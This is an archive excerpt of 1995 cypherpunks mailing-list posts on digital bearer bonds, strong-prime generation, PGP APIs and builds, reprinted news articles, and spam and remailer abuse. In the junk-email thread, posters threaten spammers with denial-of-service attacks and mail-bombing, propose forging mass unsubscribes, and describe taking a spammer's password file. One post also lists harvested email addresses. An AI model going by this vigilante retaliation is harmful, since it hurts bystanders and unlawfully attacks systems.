Message-ID: <v02120d00acd4d487906b@[199.0.65.105]>



>Ps. I know I could probably look this up, but exactly what are bearer bonds?
>I frequently hear them mentioned when market anonymity and money laundering
>come up.

It's the little questions which take the longest to answer...

I wrote something here in cypherpunks this year called "The Book Entry /
Certificate Distinction", which you might want to check out in the
archives.

Bearer bonds and bearer certificates (like cash) belong to the bearer. To
be flip, possession is 100% of the law with a bearer bond. Bearer bonds can
be stolen, but they aren't registered anywhere, which makes them useful for
anonymity. All along the bottom of a bearer bond are little squares called
coupons, which you cut out periodically and mail in to the issuer, and
they'll send you back an interest check for that period's interest. Lots of
financial phrases come from bearer bonds. When a bond trader talks about a
bond's interest rate, she may use the word "coupon" interchageably, as in,
"That bond has a 7% coupon.". Meaning, it pays 7% interest per year. Then
there's the phrase "clipping coupons", meaning someone is retired or
independently wealthy and living on their bond interest. Every month the
interest on one bond or other would come due, the coupons clipped and sent
in to the bond's issuer in return for an interest check.

Most securities these days are registered to the owner somewhere, at a
trustee, at the issuer, at a clearinghouse, or some combination of all. In
fact, most securities these days don't exist in physical form at all and
exist only on the books at clearinghouses and brokerages. This is why your
stock broker squalls about "physical delivery" when you ask for a
certificate. About a year ago, we talked about the Depository Trust
Company, the clearing house for the New York Stock Exchange. They have
entire issues there consisting of a single piece of paper in the
clearinghouse vault which are traded entirely on a book entry basis, that
is, only accounting entries are swapped when these securities change hands.

There are several reasons for this. The putative reason is that as taxing
authorities, like the Internal Revenue Service, have relied increasingly on
various cash-flow taxes like the income tax for thier revenue, they have
slowly regulated or legislated bearer bonds out of existence in favor of
registered, and more to the point, book-entry securities.

However, like everything else, law and regulation is really a creature of
technology, and the technological reason that book-entry and consequently
registered certificates are popular is because they're cheaper to handle
locked down in a vault in a clearing house somewhere with the ownership
changing hands by changing offsetting accounting entries at the buyer,
seller, and clearinghouse.

This is a direct consequence of financial systems organized on top of
hierarchical communications networks, which was how all communication
networks were organized before automated switching, and, more to the point,
microprocessor switching made them more and more geodesic in structure. You
might want to check the archives for more of my rants here on that subject.

The thing about digital certificates, of which ecash is only the camel's
nose in the tent, is that while electronic, they're actual bearer
certificates. You get a lot of great non-sequiters when you talk about
them. "Digital bearer certificates", when you can't actually touch them to
"hold" them, Electronic "physical" delivery, and the like.

So, with a digital bearer bond, you would have in effect a bundle of
digital certificates. One would be for the principal and whould be good for
the repayment of that principal on the date the bond was called or the
redemption date, however the bond offering is written. The other
certificates would represent coupons, one for each interest period for the
life of the bond.

These digital certificates, in combination increasingly geodesic networks
enabled by exponentially falling microprocessor prices and strong
cryptography, theoretically allow secure, point-to-point trading of any
security of any amount with instantaneous clearing and cash settlement.

The current hierarchical capital market model, with brokers, "wholesalers",
and central exchanges has been collapsing for decades since the advent of
electronic trading systems (glorified computer bulletin boards, really)
like NASDAQ.  With the coming of digital certificate technology on public
networks, these markets will be "surfacted" into smaller and smaller
concentrations of information and capital.

I have no idea what markets will look like when we "return" to things like
digital bearer bonds, but there's a prima facie example now on the web as
we speak. This week Mark Grant just upgraded his Electronic Cash Market
(ecm)-based cyberbuck (c$) webpage "trading post", so that it will take the
new Mark Twain ecash. That means that it will be possible to trade old
Digicash beta-certificate c$, which sold for 5 cents US per c$, and
instataneously clear and settle them for Mark Twian ecash on-line. No
checks have to be sent between trading parties to buy these certificates
anymore, which should lower transaction costs significantly, not to mention
the float on the money while the trade settled.

It was curious that people were buying these things to begin with, as they
had no value at all except their uniqueness, anonymous electronic
transmissibility, and a promise from Digicash BV to issue only a millon of
them.  Yet now, with the market made infinitely more liquid with the
introduction of real-time cash settlement, things will get, as Alice said,
"curioser and curiouser". Digicash still has some large number of these
things in the "treasury" unissued. I believe these original beta-test
certificates have both payee and payor anonymity, especially if traded
offline, which has been how they've been traded through the ecm.

More fun with numbers.

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From eay at mincom.oz.au  Sun Nov 19 14:59:47 1995
From: eay at mincom.oz.au (Eric Young)
Date: Mon, 20 Nov 1995 06:59:47 +0800
Subject: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951116091316.19868C-100000@eagle.nexor.co.uk>
Message-ID: <Pine.SOL.3.91.951117123337.27369A-100000@orb>


On Thu, 16 Nov 1995, Andy Brown wrote:
> > Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
> > (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.
> As a matter of interest, how long did it take you to generate this, and
> with what hardware?  I left a 120Mhz Pentium searching for 15 hours
> overnight without any success (it managed to eliminate 10 candidate primes
> as not strong in that time). 

Well, I left it running for about 50 hours over last weekend without a hit. 
Then I restarted it on Monday night and got a hit in about 12 hours :-).
(I thought it has finished sooner but I looked again at the 'script(1)' 
output and it did take 12 hours).
It is sort of hard to tell how longs things would take, due to the hit or
miss nature of this kind of search for primes. This is on a SGI with a
200mhz R4400 which is about the same speed as a 120mhz pentium when using
my maths libraries.

I'm doing the 'pick' an odd random number 'p', sieve p and (p-1)/2 over
the first 2000 primes, adding in steps until a number passes the sieve.
For a generator of 2, p mod 24 == 11 should be true.

When it passes, then do Miller-Rabin tests on P and (P-1/2) enough times
to be happy that the number is probably a prime :-). 

I believe that there are improvement that I can put in there for the
initial search for candidate primes

The actuall numbers for the search are as follows, 
1057 numbers passed the 'strong prime sieve'. 
7 numbers passed the prime test 
1 number passed both the prime and strong prime test. 

I suspect the ratio of 132 cadidates for 'strong' prime testing for each
'prime' could be brought down quite a bit but since I only need strong
primes for DH parameters, I probably will not spend the time on improving
my initial sieve right now. 

eric

PS, I just 'found' another 2048 bit strong prime last friday night,
2929 numbers passed the 'strong prime sieve'.
29 numbers passed the prime test (101 candidates per hit)
1 number passed both the prime and strong prime test,
4h12m run time.
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au    | more followups than the message contents :-)







From warlord at MIT.EDU  Sun Nov 19 15:59:06 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Mon, 20 Nov 1995 07:59:06 +0800
Subject: ecash as pgp
In-Reply-To: <199511191118.DAA14424@infinity.c2.org>
Message-ID: <199511192339.PAA07631@tess-turbo.mit.edu>


> 	Secondly, from what I can tell, it's like PGP. To integrate it
> into other software you have to do all sorts of nasty output
> parsing. why the hell can't it just produce nice, terse, informative,
> UNIX-like output?

This will change with PGP 3.  There is a very nice, easy API for PGP 3
which I have been working on for over the last month.  In fact, the
main processing code is done.  After Tranksgiving I will be working on
an API document which explains the design and implementation of the
API.

IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
which has all of the main functionality of PGP w.r.t. creating messages,
and the program is only 250 lines of commented C code.

The current work is far from complete, but it is getting close!  It
should make integrating PGP into other programs very simple -- just
link against libpgp.a. :)

Enjoy!

-derek





From sameer at c2.org  Sun Nov 19 16:07:54 1995
From: sameer at c2.org (sameer)
Date: Mon, 20 Nov 1995 08:07:54 +0800
Subject: ecash as pgp
In-Reply-To: <199511192339.PAA07631@tess-turbo.mit.edu>
Message-ID: <199511192338.PAA13806@infinity.c2.org>


	Cool! I'm really glad you're working in this. Now if only
digicash would release libecash.a, we'd have the infrastructure for
some killer apps.

> 
> > 	Secondly, from what I can tell, it's like PGP. To integrate it
> > into other software you have to do all sorts of nasty output
> > parsing. why the hell can't it just produce nice, terse, informative,
> > UNIX-like output?
> 
> This will change with PGP 3.  There is a very nice, easy API for PGP 3
> which I have been working on for over the last month.  In fact, the
> main processing code is done.  After Tranksgiving I will be working on
> an API document which explains the design and implementation of the
> API.
> 
> IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
> which has all of the main functionality of PGP w.r.t. creating messages,
> and the program is only 250 lines of commented C code.
> 
> The current work is far from complete, but it is getting close!  It
> should make integrating PGP into other programs very simple -- just
> link against libpgp.a. :)
> 
> Enjoy!
> 
> -derek
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From warlord at MIT.EDU  Sun Nov 19 16:09:09 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Mon, 20 Nov 1995 08:09:09 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511190419.UAA15156@infinity.c2.org>
Message-ID: <199511192347.PAA07661@tess-turbo.mit.edu>


> MIME Object Security Services. It's a technically superior alternative
> to PGP, but one with an uncertain future. It's not being actively
> developed by anyone other than TIS, and their TISMOSS prototype
> implementation is far from being generally usable.

What do you mean by "technically superior"?  What technical merits
does MOSS have over PGP?  It does have a better protocol with which to
integrate it into mailers, but it is only a transmission protocol, not
a security mechanism change.  Worse, MOSS uses X.509, which requires a
lot of overhead for certificates.

On the other hand, the MIME-PGP protocol can provide the same
integration functionality as MOSS and still allow the use of the
simple PGP certification structure that already exists.

-derek





From rjc at clark.net  Sun Nov 19 16:11:17 1995
From: rjc at clark.net (Ray Cromwell)
Date: Mon, 20 Nov 1995 08:11:17 +0800
Subject: "Junk E-Mail"
Message-ID: <199511192347.SAA06834@clark.net>



  Is anyone else getting lots of junk e-mail lately? I'm getting all
kinds of direct marketing crap to both of my main accounts and I haven't
posted to usenet in months. I pretty much only post to cypherpunks, and
that is rarely. And I never put my real email address on web sites that
ask for them. I fear I am on some kind of direct marketing e-mail
"list". I've warned the perpetrators that if I get another ad from
them, they better expect a denial-of-service attack from me on their
site and lots of mail-bombs.


sick of the clutter,
-Ray






From wilcoxb at taussky.cs.colorado.edu  Sun Nov 19 16:35:40 1995
From: wilcoxb at taussky.cs.colorado.edu (Bryce)
Date: Mon, 20 Nov 1995 08:35:40 +0800
Subject: ecash as pgp
In-Reply-To: <199511192339.PAA07631@tess-turbo.mit.edu>
Message-ID: <199511200021.RAA09388@taussky.cs.colorado.edu>



-----BEGIN PGP SIGNED MESSAGE-----

> This will change with PGP 3.  There is a very nice, easy API for PGP 3
> which I have been working on for over the last month.  In fact, the
> main processing code is done.  After Tranksgiving I will be working on
> an API document which explains the design and implementation of the
> API.
> 
> IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
> which has all of the main functionality of PGP w.r.t. creating messages,
> and the program is only 250 lines of commented C code.
> 
> The current work is far from complete, but it is getting close!  It
> should make integrating PGP into other programs very simple -- just
> link against libpgp.a. :)


This is SUCH good news!  May your coding be swift and sure.  Let no
bug delay that wonderful day of public distribution.


Regards,

Bryce


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMK/KF/WZSllhfG25AQG+1gP/apI7RmfRne74IhYf7UELMH0Bm1gTIMe5
JibSxLtVhUE+WsAn5dn/Hwt797M11hc/DqpfDgeWlw7xIUxQKEWKLDGoeChHzFBG
T/7xc4+6H3DA4ZZZSMWDPvM1aJG71u+thnHU4r+fMOO3k9tKJ5YAsfcRD0l4+JL4
3Lp5IjKJbm8=
=vDu5
-----END PGP SIGNATURE-----





From turner at TeleCheck.com  Sun Nov 19 19:10:01 1995
From: turner at TeleCheck.com (Joe Turner)
Date: Mon, 20 Nov 1995 11:10:01 +0800
Subject: Recompiling PGP262i under microsoft.
Message-ID: <9511200255.AA03117@mercury.telecheck.com>



For those that might benefit, I have included some notes I have gained 
through my wanderings through PGPland, towards an easy PGP-mail program 
for Windows.  Below I have included sketchy details in compiling PGP 
under as an MS-DOS app, WIN16 DLL, and Win32 DLL. 
 
I won't be able to provide specific details, until I recover data from 
my backup tapes (I had a nasty drive failure, and have been lethargic in 
recovering).  I finally get my IBM PC/RT configured for TCP/IP and my PC 
explodes. :<. 
 
If anything here is wrong, or fuzzy, feel free to post corrections, 
etc., as this is all from my alcohol soaked, nicotine riddled brain. 
 
Compiling PGP under MSVC 1.5 & 2.x 
========= === ===== ==== === = === 
 
To compile PGP under MSVC 1.5 (I believe there is a supplied Microsoft C 
make file that was written for Quick C) you will need to create a 
project and add the files necessary.  Be sure to include the already 
compiled RSAREF.LIB in the project files. 
 
Unfortunately, there is one very annoying problem with Microsoft Visual 
C, in which it will regenerate the dependencies from the source code 
files without preprocessing the #ifdefs.  You will have to edit the make 
file and take out all of the UNIX sys/whatever stuff. 
 
I believe this is the biggest hurdle, but you might try using the Quick 
C make file, although I don't think it will work without modification 
(Microsoft seems disenchanted with compatibility, even between revisions 
of their own software). 
 
You may also have some trouble with type conversion, but I think its 
intuitive to overcome that. (its been a while...).  If anyone knows of
an easier way to do this, I will be more than happy to listen. 
 
Compiling RSAREF as a DLL under MSVC 
========= ====== == = === ===== ==== 
 
This is easy, but you may have trouble with the dependencies again.  The 
most important thing is to create a .DEF file and put all of the export 
declarations in there.  Unless you plan on rewrite PGP to load the DLL 
dynamically, simply link against it so save a few headaches (remember 
you still need a .DEF file or you will get unresolved errors!). 
 
Compiling PGP as a Windows DLL 
========= === == = ======= === 
 
I was able to find someone in Australia (sorry, the name eludes me at 
the moment) who managed to port PGP to a Windows DLL, under Borland C.  
I only installed Borland C++ 4.0 today, so much of my work/play has been 
targeted towards Microsoft Visual C++ 1.5/2.0 under NT (besides I was 
waiting on PGP3.0). 
 
If anyone wants these files (for Borland) I will send them out when I 
recover them (hopefully).  It includes modifications to no more than 
three files, and includes both reentrant and non-reentrant entry points.  
I also have the mail program (MAPI) that this guy wrote in executable 
form.  He was very careful about the Austrailian equivalent of the ITAR, 
so he would only send the modified files, which I will pass on for those 
who are interested. 
 
If you want to do the same thing under MSVC, the same changes apply. 

Hope that help some. 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzCXvuAAAAEEALiDFkQgR9leZVf5X0HLPdUFmtfyp3X0nFMi7RjqIsv1pAh9
ZZFVwkBlo01APJcw4ncPrpjGKvu8P7t0a6nB+tIZliGGvmCt/SSVyc44RdTz1KV2
TlsA/NW1WF4yBARK1aCuHgrtwfOhV8hBqh88TlJ/DSMxDXCM1+w0jdWG+cPtAAUR
tC9Kb2UgTi4gVHVybmVyIChpbnNlY3VyZSkgPHR1cm5lckB0ZWxlY2hlY2suY29t
Pg==
=sGFY
-----END PGP PUBLIC KEY BLOCK-----
-- 
Joe N. Turner		Telecheck International
turner at telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
 





From nobody at REPLAY.COM  Sun Nov 19 20:56:15 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 20 Nov 1995 12:56:15 +0800
Subject: Ponzi Web
Message-ID: <199511200430.FAA02552@utopia.hacktic.nl>



NY Times, 11-20-95, front page.

If Medium Is the Message, the Message Is the Web

By John Markoff

San Francisco, Nov. 19 -- The Associated Press was formed in
the mid-19th century when a group of newspapers decided to
invest jointly in a newfangled medium -- the telegraph -- to
speed the collection and dissemination of information.

Last week, A.P. announced that it would adopt a newer-fangled
medium -- the World Wide Web -- to begin distributing its
articles and photographs over the global Internet. It was
simply the latest, but perhaps most historically significant,
move yet by an old-line media organization into the World Wide
Web, the Internet multimedia information-retrieval system that
appears on the verge of becoming a mass medium itself.

If the medium is the message, then the message these days is
the World Wide Web.

In short order the Web, which three years ago was little more
than a research tool for physicists and computer hobbyists,
has flourished. It is being embraced by media concerns,
consumer-product companies and businesses of various stripes
that are creating thousands of so-called Web sites each month,
with the number of computers playing host to one or more of
these sites already exceeding 100,000.

Conservative estimates place the number of people who have
used the Web in the millions, and it is not hard to find more
breathless estimates in the tens of millions.

Capable of letting people use computers to send and receive
text, sound, still images and video clips, the Web
incorporates elements of the various print and electronic
media that have preceded it. And yet, the Web is poised not to
replace its predecessors but to take a place alongside them as
a social, cultural and economic force in its own right.

Its complementary role is already evident: many radio stations
and all the major television networks have Web sites promoting
their programs and stars. Newspapers, including The New York
Times, are devising cyberspace editions.

And few movies anymore are released without a promotional Web
site, including "Goldeneye" the James Bond film that opened
this weekend at theaters everywhere and on the Web at the
address http://www.mgmua.com/bond. The site offers the movie's
theme song performed by Tina Turner, more than a dozen video
clips from the film and illustrated biographies of the cast
members.

Prime-time television commercials by Toyota and other
advertisers now routinely include a Web address. And Procter
& Gamble, whose advertising has long helped underwrite the
mass media, has even staked out prime Web real estate by
reserving addresses that include flu.com and toiletpaper.com.

"We are poised on the edge of a new medium," Clay Felker,
director of the magazine program at the University of
California at Berkeley's graduate journalism school, said.
"It's going to change the nature of how we acquire
information."

As with each mass medium that has arrived before it, the Web
has reached this threshold through a confluence of a key
technology, a ready audience and a stream of corporate backers
willing to bet that profitable businesses can be built on it.
But few experts are willing to declare that the Web has taken
its place in the mass media pantheon because the profitable
business formulas have yet to be found.

Newspapers and magazines make money by selling individual
copies, subscriptions and advertising space. Radio and
television stations sell air time to those with money and a
message. Movie theaters sell tickets. But on the Web so far,
despite seed-money by adventurous advertisers and some
tentative efforts to charge for access to sites or services,
there is no certainty that this medium will achieve the
critical mass that capitalism demands of its mass media.

"How do you make a business out of the World Wide Web?" asked
Norman Pearlstine, editor in chief of Time Inc., which has an
experimental Web site called Pathfinder that offers selected
contents from the company's magazines
(http://www.pathfinder.com). But because ad revenue alone is
not carrying the freight, Time Inc. will begin testing ways to
charge visitors to its site.

And yet, the technological prerequisites are firmly in place.
The Web is an outgrowth of the Internet, which began as an
academic research experiment in the late 1960's. For more than
two decades the Internet remained largely inaccessible, used
mainly by computer scientists and Pentagon researchers,
university scholars and students.

Then came the World Wide Web.

Like the Internet, the Web began as a tool to let scientists
easily and quickly share information. Conceived in the late
1980's by Tim Berners-Lee, who was then a software designer at
CERN, the Swiss physics research center, the basic Web
technology was first put to use in 1990.

The big breakthrough came in 1992, when student researchers at
the National Center for Supercomputing Applications in
Illinois created Mosaic, a simple software tool called a Web
browser. Mosaic permitted access to information anywhere on
tke World Wide Web by letting the user point and click a
computer mouse on highlighted words or images on the screen.
The browser, which became available in commercial versions
like Netscape Communications' Navigator, not only made Web
sites easily accessible, it prompted businesses, organizations
and even individuals to create new Web sites by the thousands.

Thus did the Web quickly become a standard and accepted way
for the growing millions of the computer-literate to
communicate and to entertain and inform themselves. And unlike
each previous mass medium, the Web does not require its
audience to be merely passive recipients of information.

For very little money, and with a modicum of computer skills,
virtually anyone can create his or her own Web site. Anyone
with a modem is potentially a global pamphleteer.

One consequence of this democratization is that the Web can be
a remarkably anarchic forum compared with the old-style mass
media. "Think of this as television colliding with the
telephone party line," said Paul Saffo, a computer industry
consultant at the Institute for the Future, a Menlo Park,
Calif., research firm. "In terms of social consequences, the
Web is a great experiment. It's going to deliver us community
with a vengeance -- and we may find we don't want it."

-----

NYT, 11-20-95, Business Section.

Losses From Computer Breaches Are on the Rise, a Study Finds

By Peter H. Lewis

Financial losses from computer break-ins and other security
breaches are on the rise, according to a survey of corporate
computer-security managers, with nearly half of all companies
reporting losses as a result of hackers, viruses, sabotage,
corporate spies and incompetent employees.

At least 20 of the 1,290 companies responding to the annual
security survey from Information Week magazine and the
consulting firm Ernst & Young, reported losses of more than $1
million last year.

But the poll also found that companies were more aware of the
risks arising from growing reliance on computer networks, and
were taking stronger steps to protect their information
systems.

"There is definitely increased awareness on the part of senior
management," said Daniel White, national director of
information security at Ernst & Young's Chicago office. But
Mr. White said that despite increased vigilance by computer
security officers, the lack of security tools made it risky to
conduct electronic-document interchange and other sensitive
business operations on the Internet.

"Lots of organizations are using the Internet in a thoughtful
way for marketing and information dissemination," Mr. White
said. "But do I really want to use it" for an
electronic-document transaction? "Not yet."

Details of the survey, the third annual one, are in the Nov.
28 issue of Information Week, available this week.

Among other findings were that nearly 80 percent of companies
surveyed had at least one full-time information-security
officer, a slight increase from last year. Of those, 45
percent report directly to the corporation's chief information
officer, reflecting the growing recognition of the importance
of computer security, Mr. White said.

Nearly 70 percent of those responding said their companies had
sustained a serious virus attack in the last year, a sharp
rise from 54 percent two years ago.

-----













From ericande at cnw.com  Sun Nov 19 21:24:08 1995
From: ericande at cnw.com (Eric Anderson)
Date: Mon, 20 Nov 1995 13:24:08 +0800
Subject: Visual Basic 4.0 encryption prog.
Message-ID: <01BAB6A0.6A583C20@king1-12.cnw.com>


	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the shelf
code. 
	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
I don't really care about ITAR or any of that other BS, I just won't put MY name on it.






From ericande at cnw.com  Sun Nov 19 21:36:29 1995
From: ericande at cnw.com (Eric Anderson)
Date: Mon, 20 Nov 1995 13:36:29 +0800
Subject: 
Message-ID: <01BAB6A0.530885C0@king1-12.cnw.com>




----------
From:  anonymous-remailer at shell.portal.com[SMTP:anonymous-remailer at shell.portal.com]
Sent:  Friday, November 17, 1995 7:31 PM
To:  cypherpunks at toad.com

Subject:  Shoe-horning Mondex onto the Internet -- still won't fit

>+ According to inside sources, is grossly vulnerable to replay attacks 
>(offline multi-spending to different parties)
>-- Mondex has security holes
>-- Customers who defraud Mondex-using banks have legal deniability in a 
>court of law: they can simply request banks to produce the security 
>protocols as evidence; if they refuse the case is thrown out of 
>court (precedent: UK and US phantom-ATM withdrawal cases)

HEY-sounds GREAT to me, I'm ALL FOR IT!!!






From Greg_Rose at sibelius.sydney.sterling.com  Sun Nov 19 22:46:07 1995
From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE)
Date: Mon, 20 Nov 1995 14:46:07 +0800
Subject: Cypherpunks in Sydney (Australia) Meeting
Message-ID: <9511200554.AA49910@paganini.sydney.sterling.com>



-----BEGIN PGP SIGNED MESSAGE-----

I mentioned some time ago that if there was
sufficient interest I'd organise a Sydney
Cypherpunks get-together. It was supposed to be
in mid-November :-(, but you can't have
everything.

In the absence of consultation with anyone, I've
booked a small suburban chinese restaurant for the
venue. This seems in keeping with other
cypherpunks meetings (not that I've ever been to
one...)

Date:   Wednesday December 6th.
Time:   7:00pm
Place:  Mee Ton Restaurant
        139 Concord Road
        Concord

The restaurant is easy to get to, only 20 minutes
by car from the city and easy to park.  If
driving out from the city along Paramatta Road,
you just have to be careful not to turn onto the
freeway. Concord Road is *second* and crosses
back over the freeway. The restaurant is about
400 metres north of Paramatta Road, on the
eastern side. It's also only a short walk from
North Strathfield station. If enough people are
using Public transport I can organise a pickup
from (the main) Strathfield station (a little
more convenient in terms of frequency of
trains).

I'm anticipating maybe ten-fifteen people. They
have a nice, light banquet menu for $12 per head,
everything included except alcohol.

RSVP, please, by Friday the 1st, and tell me whether
you are interested in a PGP key signing at the
same time.

I will post this to aus.org.auug, sage-au-nsw,
sci.crypt. Any other suggestions appreciated, and
don't hesitate to pass around the details.

- -- 
Greg Rose               INTERNET: greg_rose at sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLAX/6RQkCwJ0+ZNAQFU1AP/Y4d6RUieAKMoz4MJCeX5OXyhCNfTfrMp
/szVqe2ICn+9F+T+Ggad1XKSsO3NBk1Lmo478NUYHuCDuMODSgM0YRxRo7SuEd9d
joFtpUIAjBAs+e0beO7DI934XFSvDQini+YT2NxDtUtEM0c4fVh96oQyJguSnWP2
Mx8ZubrzoDs=
=R65K
-----END PGP SIGNATURE-----





From frantz at netcom.com  Sun Nov 19 23:59:11 1995
From: frantz at netcom.com (Bill Frantz)
Date: Mon, 20 Nov 1995 15:59:11 +0800
Subject: remailer abuse
Message-ID: <199511200747.XAA09583@netcom19.netcom.com>


At 22:43 11/19/95 -0800, Timothy C. May wrote:
>Yes, anonymous communication is getting easier, and the costs of trying to
>stop it are becoming impossibly high. It would essentially require a police
>state to stop, and even then it probably couldn't be stopped...

Considering that there are well known ways of spoofing IP addresses, if you
really want to, you can be anyone.  (They must be well know.  I know at
least one. <grin>)


>2. Sender pays the costs of transmission. That is, if someone wishes to
>send 10 megabytes to a site, at least _he_ (or _she_) pays the freight.
>This is of course the way things now work with the U.S. postal system, with
>"Postage Due" no longer common...

I think we lack direct charges for network traffic because detailed
accounting for use of each net-link is too expensive.  The situation is
similar to that of the telephone system in the 1950s, where the switches
which connected local calls did not have enough smarts to do charging, and
so started the tradition of "free" local calls.

When lots of people start sending full motion video over the net we may see
ISPs develop use based charging schemes.  I should add that one of the
reasons I use Netcom is that they do NOT charge for connect time or network
traffic.  There is a market for known, fixed costs too.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From dannyc at gmap.leeds.ac.uk  Mon Nov 20 03:31:57 1995
From: dannyc at gmap.leeds.ac.uk (Danny Cox)
Date: Mon, 20 Nov 1995 19:31:57 +0800
Subject: Mbone seminar 21st Nov 16:15UTC: FIREWALLS AS A NETWORK SECURITY
Message-ID: <10778.9511201052@gmap.leeds.ac.uk>


Piete,

  I read variuos bits about using the MBone for conferences etc including 
this one, and I'd like to be able to listen to them.  Can you point me to
any tools which I can use to access it and give me some pointers as to how
to use them ?

  Thanks,
Danny Cox





From jamesd at echeque.com  Mon Nov 20 04:53:43 1995
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 20 Nov 1995 20:53:43 +0800
Subject: "Junk E-Mail"
Message-ID: <199511200542.VAA04645@blob.best.net>


At 06:47 PM 11/19/95 -0500, Ray Cromwell wrote:
>
>  Is anyone else getting lots of junk e-mail lately?

Yes.

When people spam usenet, they get hit by a large highly organized 
counter attack.  When they spam people by email, no large
counter attack -- we need a place were people go to share 
knowledge of email abuse.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From llurch at networking.stanford.edu  Mon Nov 20 04:54:17 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Mon, 20 Nov 1995 20:54:17 +0800
Subject: "Junk E-Mail"
In-Reply-To: <199511192347.SAA06834@clark.net>
Message-ID: <Pine.ULT.3.91.951119213257.14590D-100000@Networking.Stanford.EDU>


On Sun, 19 Nov 1995, Ray Cromwell wrote:

>   Is anyone else getting lots of junk e-mail lately? I'm getting all
> kinds of direct marketing crap to both of my main accounts and I haven't
> posted to usenet in months. I pretty much only post to cypherpunks, and
> that is rarely. And I never put my real email address on web sites that
> ask for them. I fear I am on some kind of direct marketing e-mail
> "list". I've warned the perpetrators that if I get another ad from
> them, they better expect a denial-of-service attack from me on their
> site and lots of mail-bombs.

I have been told that this is off-topic, but yes. And same conclusion here
that someone is passing around an old list. So far, most of the junk email
I've received is addressed to jabba at deathstar, an account I haven't used
for three years. Most of the other folks around here get junk mail
addressed to username at jessica or @mordor, when in fact we all moved to
@networking a year ago. 

I happen to have a little over 50K addresses used by the valleynet.net
spammer. I don't see your address on the list, but there are 86 other
clark.net addresses, and these: 

rjc at bayvax.decus.org
rjc at mhc.edu
rjc at netpoint.net
rjc at plaza.ds.adp.com
rjc at wells.haystack.edu
rjcd85a at prodigy.com
rjconn at freenet.calgary.ab.ca
rjcook at ns.cencom.net
rjcron at most.magec.com
rjcsys at cpcug.org

I propose a surgical strike mailbomb response -- forge unsubscribes and
complaints to postmaster from every one of these 50K addresses I have. I 
know they've been spammed before; they'd probably agree. To what 
addresses should I send these unsubscribes?

The list of spammed addresses is yours if you can verify who you are and
tell me what you're going to do with it. 

A malicious attack might be justifiable in extreme cases. For example, 
because of some really, really stupid Web and mail server design flaws, 
it would have trivial for me to have erased the entire hard drives of all 
of the machines at valleynet.net. But I figured picking up his password 
file and telling all of his customers what I thought of him would be 
almost as effective while retainng the moral high ground.

-rich





From corey at netscape.com  Mon Nov 20 04:57:44 1995
From: corey at netscape.com (Corey Bridges)
Date: Mon, 20 Nov 1995 20:57:44 +0800
Subject: remailer abuse
Message-ID: <199511200524.VAA00445@netscape.com>


At 05:27 PM 11/19/95 -0800, Greg Broiles wrote:
>...
> If A wants to send
>messages to B, but B doesn't want to receive them, should A be forced to
>stop sending?

My rambling $.02:

I haven't thought all this through, but I have an emerging stance. Just this
week I've started ploughing through the Cyphernomicon, and was smacked in
the face with the eminently pragmatic Mr. May's statement that any law that
cannot be enforced should not exist. 

Up until, say, this week, I'd always been in favor of Caller ID. I'd figured
if anyone wants to call me, I have the right to know who it is. By default,
I had adopted this position concerning email. Now, one day I will receive an
anonymous email. Will I be offended? Maybe. Can I do anything about it? Not
likely. Anonymous communication is only going to get easier. Current
congressional prattling notwithstanding, the onus of responsibility will
have to shift to the recipient. For example, I could configure my mail
program to automatically throw away any incoming message with "anonymous" in
the "From" header. (Or any message from *@pseudo.goldenbear.com, for that
matter) 

If junk mail continues to bother people, it's only a matter of time until
mail programs' filtering capabilities become much more sophisticated. (Of
course, for all I know, there already ARE programs that do what I'm about to
propose.) People can maintain a "do not accept from" list, containing every
anonymous remailer they've ever heard about, or an "accept only from" list,
containing just the people they wish to converse with. I think it's this
second option that will become increasingly important. Sure it's your right
to send me whatever the hell you like, just as it's my right to ignore you
completely. Bringing this back to my hobby-horse of Caller ID, you end up
with even greater protection than an unlisted number--let the whole world
